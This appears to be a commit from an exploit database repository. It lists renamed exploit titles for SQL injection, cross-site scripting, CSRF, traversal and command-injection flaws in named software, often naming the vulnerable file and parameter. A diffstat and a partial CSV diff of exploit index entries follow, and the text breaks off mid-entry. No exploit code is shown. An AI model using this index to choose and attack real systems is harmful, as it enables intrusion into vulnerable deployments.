Multiple SQL Injection TCExam 11.1.29 - 'tce_xml_user_results.php' Multiple SQL Injections Calendarix 0.8.20080808 - Multiple Cross-Site Scripting / SQL Injection Calendarix 0.8.20080808 - Multiple Cross-Site Scripting / SQL Injections Mambo Component Docman 1.3.0 - Multiple SQL Injection Mambo Component Docman 1.3.0 - Multiple SQL Injections ARSC Really Simple Chat 3.3-rc2 - Cross-Site Scripting / Multiple SQL Injection ARSC Really Simple Chat 3.3-rc2 - Cross-Site Scripting / Multiple SQL Injections Paliz Portal - Cross-Site Scripting / Multiple SQL Injection Paliz Portal - Cross-Site Scripting / Multiple SQL Injections Sphider 1.3.x - Admin Panel Multiple SQL Injection Sphider 1.3.x - Admin Panel Multiple SQL Injections Code Widgets Online Job Application - 'admin.asp' Multiple SQL Injection Code Widgets Online Job Application - 'admin.asp' Multiple SQL Injections Code Widgets Multiple Question - Multiple Choice Online Questionnaire SQL Injection Code Widgets Multiple Question - Multiple Choice Online Questionnaire SQL Injections EasyGallery 5 - 'index.php' Multiple SQL Injection EasyGallery 5 - 'index.php' Multiple SQL Injections Xenon - 'id' Parameter Multiple SQL Injection Xenon - 'id' Parameter Multiple SQL Injections eFront 3.6.10 - 'professor.php' Script Multiple SQL Injection eFront 3.6.10 - 'professor.php' Script Multiple SQL Injections eFront 3.6.x - Multiple Cross-Site Scripting / SQL Injection eFront 3.6.x - Multiple Cross-Site Scripting / SQL Injections Dolibarr ERP/CRM - /user/index.php Multiple Parameter SQL Injection Dolibarr ERP/CRM - /user/info.php id Parameter SQL Injection Dolibarr ERP/CRM - /admin/boxes.php rowid Parameter SQL Injection Dolibarr ERP/CRM - '/user/index.php' Multiple Parameter SQL Injections Dolibarr ERP/CRM - '/user/info.php' 'id' Parameter SQL Injection Dolibarr ERP/CRM - '/admin/boxes.php' 'rowid' Parameter SQL Injection PrestaShop 1.4.4.1 - /modules/mondialrelay/kit_mondialrelay/SuiviExpedition_ajax.php Expedition Parameter Cross-Site Scripting PrestaShop 1.4.4.1 - /admin/ajaxfilemanager/ajax_save_text.php Multiple Parameter Cross-Site Scripting PrestaShop 1.4.4.1 - '/modules/mondialrelay/kit_mondialrelay/SuiviExpedition_ajax.php' 'Expedition' Parameter Cross-Site Scripting PrestaShop 1.4.4.1 - '/admin/ajaxfilemanager/ajax_save_text.php' Multiple Parameter Cross-Site Scripting Manx 1.0.1 - /admin/admin_blocks.php Filename Parameter Traversal Arbitrary File Access Manx 1.0.1 - /admin/admin_pages.php Filename Parameter Traversal Arbitrary File Access Manx 1.0.1 - '/admin/admin_blocks.php' 'Filename' Parameter Traversal Arbitrary File Access Manx 1.0.1 - '/admin/admin_pages.php' 'Filename' Parameter Traversal Arbitrary File Access SugarCRM Community Edition 6.3.0RC1 - 'index.php' Multiple SQL Injection SugarCRM Community Edition 6.3.0RC1 - 'index.php' Multiple SQL Injections Balero CMS 0.7.2 - Multiple Blind SQL Injection Balero CMS 0.7.2 - Multiple Blind SQL Injections WordPress Plugin'WP Mobile Edition 2.7 - Remote File Disclosure WordPress Plugin WP Mobile Edition 2.7 - Remote File Disclosure CMS Faethon 1.3.4 - 'articles.php' Multiple SQL Injection CMS Faethon 1.3.4 - 'articles.php' Multiple SQL Injections Dotclear 2.4.1.2 - /admin/auth.php login_data Parameter Cross-Site Scripting Dotclear 2.4.1.2 - /admin/blogs.php nb Parameter Cross-Site Scripting Dotclear 2.4.1.2 - /admin/comments.php Multiple Parameter Cross-Site Scripting Dotclear 2.4.1.2 - /admin/plugin.php page Parameter Cross-Site Scripting Dotclear 2.4.1.2 - '/admin/auth.php' 'login_data' Parameter Cross-Site Scripting Dotclear 2.4.1.2 - '/admin/blogs.php' 'nb' Parameter Cross-Site Scripting Dotclear 2.4.1.2 - '/admin/comments.php' Multiple Parameter Cross-Site Scripting Dotclear 2.4.1.2 - '/admin/plugin.php' 'page' Parameter Cross-Site Scripting SAP Business Objects InfoView System - /help/helpredir.aspx guide Parameter Cross-Site Scripting SAP Business Objects InfoView System - /webi/webi_modify.aspx id Parameter Cross-Site Scripting SAP Business Objects InfoView System - '/help/helpredir.aspx' 'guide' Parameter Cross-Site Scripting SAP Business Objects InfoView System - '/webi/webi_modify.aspx' 'id' Parameter Cross-Site Scripting Open Journal Systems (OJS) 2.3.6 - /lib/pkp/classes/core/String.inc.php String::stripUnsafeHtml() Method Cross-Site Scripting Open Journal Systems (OJS) 2.3.6 - '/lib/pkp/classes/core/String.inc.php' 'String::stripUnsafeHtml()' Method Cross-Site Scripting PHP Designer 2007 - Personal Multiple SQL Injection PHP Designer 2007 Personal - Multiple SQL Injections WordPress Plugin All-in-One Event Calendar 1.4 agenda-widget.php Multiple Parameter Cross-Site Scripting WordPress Plugin All-in-One Event Calendar 1.4 - 'agenda-widget.php' Multiple Parameter Cross-Site Scripting XOOPS 2.5.4 - /modules/pm/pmlite.php to_userid Parameter Cross-Site Scripting XOOPS 2.5.4 - /tiny_mce/plugins/xoopsimagemanager/xoopsimagebrowser.php Multiple Parameter Cross-Site Scripting XOOPS 2.5.4 - '/modules/pm/pmlite.php' 'to_userid' Parameter Cross-Site Scripting XOOPS 2.5.4 - '/tiny_mce/plugins/xoopsimagemanager/xoopsimagebrowser.php' Multiple Parameter Cross-Site Scripting XM Forum - 'id' Parameter Multiple SQL Injection XM Forum - 'id' Parameter Multiple SQL Injections AdaptCMS 2.0.2 TinyURL Plugin - admin.php Multiple Parameter SQL Injection AdaptCMS 2.0.2 TinyURL Plugin - 'admin.php' Multiple Parameter SQL Injections Classified Ads Script PHP - 'admin.php' Multiple SQL Injection Classified Ads Script PHP - 'admin.php' Multiple SQL Injections Limny - 'index.php' Multiple SQL Injection Limny - 'index.php' Multiple SQL Injections TCExam 11.2.x - /admin/code/tce_edit_answer.php Multiple Parameter SQL Injection TCExam 11.2.x - /admin/code/tce_edit_question.php subject_module_id Parameter SQL Injection TCExam 11.2.x - '/admin/code/tce_edit_answer.php' Multiple Parameter SQL Injection TCExam 11.2.x - '/admin/code/tce_edit_question.php' 'subject_module_id' Parameter SQL Injection jCore - /admin/index.php path Parameter Cross-Site Scripting jCore - '/admin/index.php' 'path' Parameter Cross-Site Scripting Netsweeper 4.0.8 - SQL Injection Authentication Bypass Netsweeper 4.0.8 - SQL Injection / Authentication Bypass dotProject 2.1.x - 'index.php' Multiple Parameter SQL Injection dotProject 2.1.x - 'index.php' Multiple Parameter SQL Injections MantisBT 1.2.19 - Host Header Attack MantisBT 1.2.19 - Host Header Exploit WordPress Plugin RokBox Plugin - /wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf abouttext Parameter Cross-Site Scripting WordPress Plugin RokBox Plugin - '/wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf' 'abouttext' Parameter Cross-Site Scripting cPanel WebHost Manager (WHM) - /webmail/x3/mail/clientconf.html acct Parameter Cross-Site Scripting cPanel WebHost Manager (WHM) - '/webmail/x3/mail/clientconf.html' 'acct' Parameter Cross-Site Scripting WordPress Plugin Shopping Cart for WordPress - /wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php reqID Parameter SQL Injection WordPress Plugin Shopping Cart for WordPress - /wp-content/plugins/levelfourstorefront/scripts/administration/backup.php reqID Parameter SQL Injection WordPress Plugin Shopping Cart for WordPress - /wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts.php reqID Parameter SQL Injection WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php' 'reqID' Parameter SQL Injection WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/backup.php' 'reqID' Parameter SQL Injection WordPress Plugin Shopping Cart for WordPress - '/wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts.php' 'reqID' Parameter SQL Injection PHPWeby Free Directory Script - 'contact.php' Multiple SQL Injection PHPWeby Free Directory Script - 'contact.php' Multiple SQL Injections ezStats for Battlefield 3 - /ezStats2/compare.php Multiple Parameter Cross-Site Scripting ezStats for Battlefield 3 - '/ezStats2/compare.php' Multiple Parameter Cross-Site Scripting PHP Address Book - /addressbook/register/delete_user.php id Parameter SQL Injection PHP Address Book - /addressbook/register/edit_user.php id Parameter SQL Injection PHP Address Book - /addressbook/register/edit_user_save.php Multiple Parameter SQL Injection PHP Address Book - /addressbook/register/linktick.php site Parameter SQL Injection PHP Address Book - /addressbook/register/reset_password.php Multiple Parameter SQL Injection PHP Address Book - /addressbook/register/reset_password_save.php Multiple Parameter SQL Injection PHP Address Book - /addressbook/register/router.php BasicLogin Cookie Parameter SQL Injection PHP Address Book - /addressbook/register/traffic.php var Parameter SQL Injection PHP Address Book - /addressbook/register/user_add_save.php email Parameter SQL Injection PHP Address Book - /addressbook/register/checklogin.php 'Username' Parameter SQL Injection PHP Address Book - /addressbook/register/admin_index.php q Parameter SQL Injection PHP Address Book - '/addressbook/register/delete_user.php' 'id' Parameter SQL Injection PHP Address Book - '/addressbook/register/edit_user.php' 'id' Parameter SQL Injection PHP Address Book - '/addressbook/register/edit_user_save.php' Multiple Parameter SQL Injection PHP Address Book - '/addressbook/register/linktick.php' 'site' Parameter SQL Injection PHP Address Book - '/addressbook/register/reset_password.php' Multiple Parameter SQL Injection PHP Address Book - '/addressbook/register/reset_password_save.php' Multiple Parameter SQL Injection PHP Address Book - '/addressbook/register/router.php' 'BasicLogin' Cookie Parameter SQL Injection PHP Address Book - '/addressbook/register/traffic.php' 'var' Parameter SQL Injection PHP Address Book - '/addressbook/register/user_add_save.php' 'email' Parameter SQL Injection PHP Address Book - '/addressbook/register/checklogin.php' 'Username' Parameter SQL Injection PHP Address Book - '/addressbook/register/admin_index.php' 'q' Parameter SQL Injection Hero Framework - /users/login 'Username' Parameter Cross-Site Scripting Hero Framework - /users/forgot_password error Parameter Cross-Site Scripting Hero Framework - '/users/login' 'Username' Parameter Cross-Site Scripting Hero Framework - '/users/forgot_password' 'error' Parameter Cross-Site Scripting RealtyScript 4.0.2 - Multiple Time-Based Blind SQL Injection RealtyScript 4.0.2 - Multiple Time-Based Blind SQL Injections NetApp OnCommand System Manager - /zapiServlet CIFS Configuration Management Interface Multiple Parameter Cross-Site Scripting NetApp OnCommand System Manager - /zapiServlet User Management Interface Multiple Parameter Cross-Site Scripting NetApp OnCommand System Manager - '/zapiServlet' CIFS Configuration Management Interface Multiple Parameter Cross-Site Scripting NetApp OnCommand System Manager - '/zapiServlet' User Management Interface Multiple Parameter Cross-Site Scripting Jahia xCM - /engines/manager.jsp site Parameter Cross-Site Scripting Jahia xCM - '/engines/manager.jsp' 'site' Parameter Cross-Site Scripting D-Link DIR-816L (Wireless Router) - Cross-Site Request Forgery D-Link DIR-816L Wireless Router - Cross-Site Request Forgery Alienvault Open Source SIEM (OSSIM) 3.1 - 'date_from' Parameter Multiple SQL Injection Alienvault Open Source SIEM (OSSIM) 3.1 - 'date_from' Parameter Multiple SQL Injections NeoBill - /modules/nullregistrar/PHPwhois/example.php query Parameter Remote Code Execution NeoBill - /install/include/solidstate.php Multiple Parameter SQL Injection NeoBill - '/modules/nullregistrar/PHPwhois/example.php' 'query' Parameter Remote Code Execution NeoBill - '/install/include/solidstate.php' Multiple Parameter SQL Injection C2C Forward Auction Creator 2.0 - /auction/asp/list.asp pa Parameter SQL Injection C2C Forward Auction Creator - /auction/casp/Admin.asp SQL Injection Admin Authentication Bypass C2C Forward Auction Creator 2.0 - '/auction/asp/list.asp' 'pa' Parameter SQL Injection C2C Forward Auction Creator - '/auction/casp/Admin.asp' SQL Injection (Admin Authentication Bypass) Dynamic Biz Website Builder (QuickWeb) 1.0 - 'login.asp' Multiple Field SQL Injection Authentication Bypass Dynamic Biz Website Builder (QuickWeb) 1.0 - 'login.asp' Multiple Field SQL Injections / Authentication Bypass Command School Student Management System - /sw/admin_grades.php id Parameter SQL Injection Command School Student Management System - /sw/admin_terms.php id Parameter SQL Injection Command School Student Management System - /sw/admin_school_years.php id Parameter SQL Injection Command School Student Management System - /sw/admin_sgrades.php id Parameter SQL Injection Command School Student Management System - /sw/admin_media_codes_1.php id Parameter SQL Injection Command School Student Management System - /sw/admin_infraction_codes.php id Parameter SQL Injection Command School Student Management System - /sw/admin_generations.php id Parameter SQL Injection Command School Student Management System - /sw/admin_relations.php id Parameter SQL Injection Command School Student Management System - /sw/admin_titles.php id Parameter SQL Injection Command School Student Management System - /sw/health_allergies.php id Parameter SQL Injection Command School Student Management System - /sw/admin_school_names.php id Parameter SQL Injection Command School Student Management System - /sw/admin_subjects.php id Parameter SQL Injection Command School Student Management System - /sw/backup/backup_ray2.php Database Backup Direct Request Information Disclosure Command School Student Management System - /sw/Admin_change_Password.php Cross-Site Request Forgery (Admin Password Manipulation) Command School Student Management System - /sw/add_topic.php Cross-Site Request Forgery (Topic Creation) Command School Student Management System - '/sw/admin_grades.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_terms.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_school_years.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_sgrades.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_media_codes_1.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_infraction_codes.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_generations.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_relations.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_titles.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/health_allergies.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_school_names.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/admin_subjects.php' 'id' Parameter SQL Injection Command School Student Management System - '/sw/backup/backup_ray2.php' Database Backup Direct Request Information Disclosure Command School Student Management System - '/sw/Admin_change_Password.php' Cross-Site Request Forgery (Admin Password Manipulation) Command School Student Management System - '/sw/add_topic.php' Cross-Site Request Forgery (Topic Creation) Dredge School Administration System - /DSM/loader.php Id Parameter SQL Injection Dredge School Administration System - /DSM/loader.php Account Information Disclosure Dredge School Administration System - /DSM/loader.php Cross-Site Request Forgery (Admin Account Manipulation) Dredge School Administration System - /DSM/Backup/processbackup.php Database Backup Information Disclosure Dredge School Administration System - '/DSM/loader.php' 'Id' Parameter SQL Injection Dredge School Administration System - '/DSM/loader.php' Account Information Disclosure Dredge School Administration System - '/DSM/loader.php' Cross-Site Request Forgery (Admin Account Manipulation) Dredge School Administration System - '/DSM/Backup/processbackup.php' Database Backup Information Disclosure UAEPD Shopping Script - /products.php Multiple Parameter SQL Injection UAEPD Shopping Script - /news.php id Parameter SQL Injection UAEPD Shopping Script - '/products.php' Multiple Parameter SQL Injection UAEPD Shopping Script - '/news.php' 'id' Parameter SQL Injection BloofoxCMS - /bloofox/index.php 'Username' Parameter SQL Injection BloofoxCMS - /bloofox/admin/index.php 'Username' Parameter SQL Injection BloofoxCMS - /admin/index.php Cross-Site Request Forgery (Add Admin) BloofoxCMS - '/bloofox/index.php' 'Username' Parameter SQL Injection BloofoxCMS - '/bloofox/admin/index.php' 'Username' Parameter SQL Injection BloofoxCMS - '/admin/index.php' Cross-Site Request Forgery (Add Admin) Professional Designer E-Store - 'id' Parameter Multiple SQL Injection GNUBoard 4.3x - 'ajax.autosave.php' Multiple SQL Injection Professional Designer E-Store - 'id' Parameter Multiple SQL Injections GNUBoard 4.3x - 'ajax.autosave.php' Multiple SQL Injections Xangati - /servlet/MGConfigData Multiple Parameter Directory Traversal Xangati - /servlet/Installer file Parameter Directory Traversal Xangati - '/servlet/MGConfigData' Multiple Parameter Directory Traversal Xangati - '/servlet/Installer' 'file' Parameter Directory Traversal Caldera - /costview2/jobs.php tr Parameter SQL Injection Caldera - /costview2/printers.php tr Parameter SQL Injection Caldera - '/costview2/jobs.php' 'tr' Parameter SQL Injection Caldera - '/costview2/printers.php' 'tr' Parameter SQL Injection WordPress Plugin BSK PDF Manager - 'wp-admin/admin.php' Multiple SQL Injection WordPress Plugin BSK PDF Manager - 'wp-admin/admin.php' Multiple SQL Injections ol-commerce - /OL-Commerce/affiliate_signup.php a_country Parameter SQL Injection ol-commerce - /OL-Commerce/affiliate_show_banner.php affiliate_banner_id Parameter SQL Injection ol-commerce - /OL-Commerce/create_account.php country Parameter SQL Injection ol-commerce - /OL-Commerce/admin/create_account.php entry_country_id Parameter SQL Injection OL-Commerce - '/OL-Commerce/affiliate_signup.php' 'a_country' Parameter SQL Injection OL-Commerce - '/OL-Commerce/affiliate_show_banner.php' 'affiliate_banner_id' Parameter SQL Injection OL-Commerce - '/OL-Commerce/create_account.php' 'country' Parameter SQL Injection OL-Commerce - '/OL-Commerce/admin/create_account.php' 'entry_country_id' Parameter SQL Injection NUUO NVRmini 2 3.0.8 - Multiple OS Command Injection NUUO NVRmini 2 3.0.8 - Multiple OS Command Injections Multiple Netgear Routers - Password Disclosure Multiple NETGEAR Routers - Password Disclosure WebKit - Stealing Variables via Page Navigation in FrameLoader::clear WebKit - Stealing Variables via Page Navigation in 'FrameLoader::clear' --- files.csv | 1441 ++++++++++++++++--------------- platforms/windows/dos/42223.cpp | 81 ++ platforms/windows/dos/42224.cpp | 117 +++ platforms/windows/dos/42225.cpp | 91 ++ platforms/windows/dos/42226.cpp | 136 +++ platforms/windows/dos/42227.cpp | 184 ++++ platforms/windows/dos/42228.cpp | 219 +++++ platforms/windows/dos/42229.cpp | 148 ++++ platforms/windows/dos/42230.txt | 32 + platforms/windows/dos/42231.cpp | 136 +++ platforms/windows/dos/42232.cpp | 112 +++ platforms/windows/dos/42233.cpp | 109 +++ 12 files changed, 2091 insertions(+), 715 deletions(-) create mode 100755 platforms/windows/dos/42223.cpp create mode 100755 platforms/windows/dos/42224.cpp create mode 100755 platforms/windows/dos/42225.cpp create mode 100755 platforms/windows/dos/42226.cpp create mode 100755 platforms/windows/dos/42227.cpp create mode 100755 platforms/windows/dos/42228.cpp create mode 100755 platforms/windows/dos/42229.cpp create mode 100755 platforms/windows/dos/42230.txt create mode 100755 platforms/windows/dos/42231.cpp create mode 100755 platforms/windows/dos/42232.cpp create mode 100755 platforms/windows/dos/42233.cpp diff --git a/files.csv b/files.csv index e0bb6c69f..1fe4b3ca4 100644 --- a/files.csv +++ b/files.csv @@ -21,11 +21,11 @@ id,file,description,date,author,platform,type,port 146,platforms/multiple/dos/146.c,"OpenSSL ASN.1 < 0.9.6j / 0.9.7b - Brute Forcer for Parsing Bugs",2003-10-09,"Bram Matthys",multiple,dos,0 147,platforms/windows/dos/147.c,"Need for Speed 2 - Remote Client Buffer Overflow",2004-01-23,"Luigi Auriemma",windows,dos,0 148,platforms/windows/dos/148.sh,"Microsoft Windows XP/2003 - Samba Share Resource Exhaustion Exploit",2004-01-25,"Steve Ladjabi",windows,dos,0 -153,platforms/windows/dos/153.c,"Microsoft Windows - ASN.1 LSASS.exe Remote Exploit (MS04-007)",2004-02-14,"Christophe Devine",windows,dos,0 +153,platforms/windows/dos/153.c,"Microsoft Windows - ASN.1 'LSASS.exe' Remote Exploit (MS04-007)",2004-02-14,"Christophe Devine",windows,dos,0 161,platforms/windows/dos/161.c,"Red Faction 1.20 - Server Reply Remote Buffer Overflow",2004-03-04,"Luigi Auriemma",windows,dos,0 170,platforms/multiple/dos/170.c,"Ethereal - EIGRP Dissector TLV_IP_INT Long IP Remote Denial of Service",2004-03-26,"Rémi Denis-Courmont",multiple,dos,0 176,platforms/windows/dos/176.c,"Microsoft IIS - SSL Remote Denial of Service (MS04-011)",2004-04-14,"David Barroso",windows,dos,0 -185,platforms/linux/dos/185.sh,"Slackware Linux - /usr/bin/ppp-off Insecure /tmp Call Exploit",2000-11-17,sinfony,linux,dos,0 +185,platforms/linux/dos/185.sh,"Slackware Linux - '/usr/bin/ppp-off' Insecure /tmp Call Exploit",2000-11-17,sinfony,linux,dos,0 195,platforms/hp-ux/dos/195.sh,"HP-UX 11.00/10.20 crontab - Overwrite Files Exploit",2000-11-19,dubhe,hp-ux,dos,0 212,platforms/hp-ux/dos/212.c,"HP-UX FTPD - Remote Buffer Overflow",2000-12-01,venglin,hp-ux,dos,0 214,platforms/windows/dos/214.c,"Microsoft Windows - 'Jolt2.c' Denial of Service (MS00-029)",2000-12-02,phonix,windows,dos,0 @@ -40,7 +40,7 @@ id,file,description,date,author,platform,type,port 262,platforms/hardware/dos/262.pl,"Cisco Multiple Products - Automated Exploit Tool",2001-01-27,hypoclear,hardware,dos,0 264,platforms/novell/dos/264.c,"Novell BorderManager Enterprise Edition 3.5 - Denial of Service",2001-05-07,honoriak,novell,dos,0 274,platforms/linux/dos/274.c,"Linux Kernel 2.6.3 - 'setsockopt' Local Denial of Service",2004-04-21,"Julien Tinnes",linux,dos,0 -276,platforms/windows/dos/276.delphi,"Microsoft Windows XP/2000 - TCP Connection Reset Remote Attack Tool",2004-04-22,Aphex,windows,dos,0 +276,platforms/windows/dos/276.delphi,"Microsoft Windows XP/2000 - TCP Connection Reset Remote Exploit",2004-04-22,Aphex,windows,dos,0 298,platforms/windows/dos/298.pl,"Emule 0.42e - Remote Denial of Service",2004-05-16,"Rafel Ivgi",windows,dos,80 299,platforms/windows/dos/299.c,"Symantec Multiple Firewall - DNS Response Denial of Service",2004-05-16,houseofdabus,windows,dos,0 306,platforms/linux/dos/306.c,"Linux Kernel 2.4.x / 2.6.x - Assembler Inline Function Local Denial of Service",2004-06-25,lorenzo,linux,dos,0 @@ -161,7 +161,7 @@ id,file,description,date,author,platform,type,port 931,platforms/windows/dos/931.html,"Microsoft Internet Explorer - DHTML Object Handling Vulnerabilities (MS05-020)",2005-04-12,Skylined,windows,dos,0 941,platforms/windows/dos/941.c,"Yager 5.24 - Multiple Denial of Service",2005-04-14,"Luigi Auriemma",windows,dos,0 942,platforms/windows/dos/942.c,"Microsoft Windows - Malformed IP Options Denial of Service (MS05-019)",2005-04-17,"Yuri Gushin",windows,dos,0 -946,platforms/multiple/dos/946.c,"PostgreSQL 8.01 - Remote Reboot Denial of Service",2005-04-19,ChoiX,multiple,dos,0 +946,platforms/multiple/dos/946.c,"PostgreSQL 8.01 - Remote Reboot (Denial of Service)",2005-04-19,ChoiX,multiple,dos,0 948,platforms/multiple/dos/948.c,"Multiple OS (Win32/Aix/Cisco) - Crafted ICMP Messages Denial of Service (MS05-019)",2005-04-20,houseofdabus,multiple,dos,0 956,platforms/multiple/dos/956.c,"Ethereal 0.10.10 / tcpdump 3.9.1 - 'rsvp_print' Infinite Loop Denial of Service",2005-04-26,vade79,multiple,dos,0 957,platforms/linux/dos/957.c,"Tcpdump 3.8.x - 'ldp_print' Infinite Loop Denial of Service",2005-04-26,vade79,linux,dos,0 @@ -271,12 +271,12 @@ id,file,description,date,author,platform,type,port 1394,platforms/windows/dos/1394.html,"Microsoft Internet Explorer 6 - 'mshtml.dll div' Denial of Service",2005-12-29,rgod,windows,dos,0 1396,platforms/windows/dos/1396.cpp,"Microsoft IIS - Malformed HTTP Request Denial of Service",2005-12-29,Lympex,windows,dos,0 1409,platforms/windows/dos/1409.pl,"BlueCoat WinProxy 6.0 R1c - GET Request Denial of Service",2006-01-07,FistFuXXer,windows,dos,0 -1411,platforms/hardware/dos/1411.pl,"Cisco IP Phone 7940 - (Reboot) Denial of Service",2006-01-10,kokanin,hardware,dos,0 +1411,platforms/hardware/dos/1411.pl,"Cisco IP Phone 7940 - Reboot (Denial of Service)",2006-01-10,kokanin,hardware,dos,0 1416,platforms/windows/dos/1416.c,"HomeFtp 1.1 - (NLST) Denial of Service",2006-01-14,pi3ch,windows,dos,0 1422,platforms/windows/dos/1422.c,"Cerberus FTP Server 2.32 - Denial of Service",2006-01-16,pi3ch,windows,dos,0 1423,platforms/windows/dos/1423.html,"Microsoft Internet Explorer 6.x - (IMG / XML elements) Denial of Service",2006-01-18,"Inge Henriksen",windows,dos,0 1424,platforms/windows/dos/1424.pl,"TFTPD32 2.81 - GET Request Format String Denial of Service (PoC)",2006-01-19,"Critical Security",windows,dos,0 -1447,platforms/hardware/dos/1447.c,"Cisco Aironet Wireless Access Points - Memory Exhaustion ARP Attack Denial of Service",2006-01-25,Pasv,hardware,dos,0 +1447,platforms/hardware/dos/1447.c,"Cisco Aironet Wireless Access Points - Memory Exhaustion ARP (Denial of Service)",2006-01-25,Pasv,hardware,dos,0 1464,platforms/hardware/dos/1464.c,"Arescom NetDSL-1000 - (TelnetD) Remote Denial of Service",2006-02-02,"Fabian Ramirez",hardware,dos,0 1473,platforms/hardware/dos/1473.c,"Sony/Ericsson Bluetooth - (Reset Display) Denial of Service",2006-02-06,"Pierre Betouin",hardware,dos,0 1475,platforms/windows/dos/1475.html,"Microsoft Internet Explorer 7.0 Beta 2 - 'urlmon.dll' Denial of Service",2006-02-07,"Tom Ferris",windows,dos,0 @@ -296,7 +296,7 @@ id,file,description,date,author,platform,type,port 1559,platforms/windows/dos/1559.c,"Sauerbraten 2006_02_28 - Multiple Buffer Overflow/Crash Vulnerabilities",2006-03-06,"Luigi Auriemma",windows,dos,0 1560,platforms/windows/dos/1560.c,"Cube 2005_08_29 - Multiple Buffer Overflow/Crash Vulnerabilities",2006-03-06,"Luigi Auriemma",windows,dos,0 1564,platforms/windows/dos/1564.c,"Alien Arena 2006 Gold Edition 5.00 - Multiple Vulnerabilities",2006-03-07,"Luigi Auriemma",windows,dos,0 -1572,platforms/multiple/dos/1572.pl,"Dropbear / OpenSSH Server - (MAX_UNAUTH_CLIENTS) Denial of Service",2006-03-10,str0ke,multiple,dos,0 +1572,platforms/multiple/dos/1572.pl,"Dropbear / OpenSSH Server - 'MAX_UNAUTH_CLIENTS' Denial of Service",2006-03-10,str0ke,multiple,dos,0 1573,platforms/php/dos/1573.php,"Guppy 4.5.11 - (Delete Databases) Remote Denial of Service",2006-03-10,trueend5,php,dos,0 1593,platforms/windows/dos/1593.c,"Mercur MailServer 5.0 SP3 - (IMAP) Denial of Service",2006-03-19,Omni,windows,dos,0 1598,platforms/windows/dos/1598.html,"Microsoft Internet Explorer 6 - Script Action Handlers 'mshtml.dll' Denial of Service",2006-03-21,"Michal Zalewski",windows,dos,0 @@ -386,7 +386,7 @@ id,file,description,date,author,platform,type,port 2238,platforms/windows/dos/2238.html,"Microsoft Internet Explorer - Multiple COM Object Color Property Denial of Service",2006-08-21,nop,windows,dos,0 2244,platforms/multiple/dos/2244.pl,"Mozilla Firefox 1.5.0.6 - (FTP Request) Remote Denial of Service",2006-08-22,"Tomas Kempinsky",multiple,dos,0 2245,platforms/windows/dos/2245.pl,"MDaemon POP3 Server < 9.06 - (USER) Remote Buffer Overflow (PoC)",2006-08-22,"Leon Juranic",windows,dos,0 -2246,platforms/hardware/dos/2246.cpp,"2WIRE Modems/Routers - CRLF Denial of Service",2006-08-22,preth00nker,hardware,dos,0 +2246,platforms/hardware/dos/2246.cpp,"2WIRE Modems/Routers - 'CRLF' Denial of Service",2006-08-22,preth00nker,hardware,dos,0 2302,platforms/windows/dos/2302.pl,"J. River Media Center 11.0.309 - Remote Denial of Service (PoC)",2006-09-05,n00b,windows,dos,0 2303,platforms/multiple/dos/2303.html,"dsock 1.3 - (buf) Remote Buffer Overflow (PoC)",2006-09-05,DaveK,multiple,dos,0 2334,platforms/windows/dos/2334.py,"Multi-Threaded TFTP 1.1 - Long GET Request Denial of Service",2006-09-08,n00b,windows,dos,0 @@ -507,7 +507,7 @@ id,file,description,date,author,platform,type,port 3331,platforms/windows/dos/3331.c,"VicFTPS < 5.0 - 'CWD' Remote Buffer Overflow (PoC)",2007-02-18,r0ut3r,windows,dos,0 3341,platforms/windows/dos/3341.cpp,"TurboFTP Server 5.30 Build 572 - 'newline/LIST' Multiple Remote Denial of Service",2007-02-20,Marsu,windows,dos,0 3343,platforms/windows/dos/3343.cpp,"FTP Voyager 14.0.0.3 - (CWD) Remote Stack Overflow (PoC)",2007-02-20,Marsu,windows,dos,0 -3347,platforms/windows/dos/3347.cpp,"FTP Explorer 1.0.1 Build 047 - (CPU Consumption) Remote Denial of Service",2007-02-20,Marsu,windows,dos,0 +3347,platforms/windows/dos/3347.cpp,"FTP Explorer 1.0.1 Build 047 - Remote CPU Consumption (Denial of Service)",2007-02-20,Marsu,windows,dos,0 3350,platforms/windows/dos/3350.html,"BrowseDialog Class - 'ccrpbds6.dll' Multiple Methods Denial of Service",2007-02-21,shinnai,windows,dos,0 3362,platforms/multiple/dos/3362.py,"Snort 2.6.1 - DCE/RPC Preprocessor Remote Buffer Overflow Denial of Service",2007-02-23,"Trirat Puttaraksa",multiple,dos,0 3385,platforms/windows/dos/3385.pl,"XM Easy Personal FTP Server 5.30 - 'ABOR' Format String Denial of Service",2007-02-28,"Umesh Wanve",windows,dos,0 @@ -531,14 +531,14 @@ id,file,description,date,author,platform,type,port 3461,platforms/windows/dos/3461.pl,"TFTP Server 1.3 - Remote Buffer Overflow Denial of Service",2007-03-12,"Umesh Wanve",windows,dos,0 3464,platforms/windows/dos/3464.cpp,"News Bin Pro 4.32 - Article Grabbing Remote Unicode Buffer Overflow",2007-03-12,Marsu,windows,dos,0 3514,platforms/windows/dos/3514.pl,"Avant Browser 11.0 build 26 - Remote Stack Overflow Crash",2007-03-18,DATA_SNIPER,windows,dos,0 -3526,platforms/hardware/dos/3526.pl,"Cisco Phone 7940/7960 - (SIP INVITE) Remote Denial of Service",2007-03-20,MADYNES,hardware,dos,0 +3526,platforms/hardware/dos/3526.pl,"Cisco Phone 7940/7960 - 'SIP INVITE' Remote Denial of Service",2007-03-20,MADYNES,hardware,dos,0 3527,platforms/win_x86/dos/3527.pl,"Mercur IMAPD 5.00.14 (Windows x86) - Remote Denial of Service",2007-03-20,mu-b,win_x86,dos,0 3535,platforms/hardware/dos/3535.pl,"Grandstream Budge 